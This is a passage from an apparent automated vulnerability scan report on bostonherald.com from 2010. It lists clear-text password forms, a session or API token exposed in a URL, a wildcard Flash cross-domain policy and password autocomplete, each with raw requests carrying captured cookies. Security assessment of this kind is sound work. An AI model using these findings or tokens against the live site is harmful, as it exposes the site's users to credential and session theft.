The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:55:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.26. http://bostonherald.com/users/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:00:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 03:00:30 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<hr class="userSep" />

<form name="register" action="/users/login?returnto=/users/" method="POST">

<div style="width:350px; margin:40px auto; ">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" style="width:340px;"/></div>
...[SNIP]...

3.27. http://bostonherald.com/users/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /users/register HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:32:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 09:32:27 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

3.28. http://bostonherald.com/users/register/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:00:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 03:00:51 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

4. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bostonherald.com
Path:   /entertainment/movies/

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /entertainment/movies/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:19:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<!--//include 8 //-->
           

<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...

5. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: bostonherald.com

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:07 GMT
Server: Apache
Last-Modified: Wed, 23 Jan 2008 23:45:32 GMT
Accept-Ranges: bytes
Content-Length: 277
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bostonherald.com" />
<allow-access-from domain="*.heraldinteractive.com" />
...[SNIP]...

6. Password field with autocomplete enabled  previous  next
There are 28 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.2. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:57:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.3. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.4. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:01:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 75254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.5. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:29:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.6. http://bostonherald.com/news/columnists/view.bg  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/columnists/view.bg?articleid=1294590&format=comments&srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.7. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
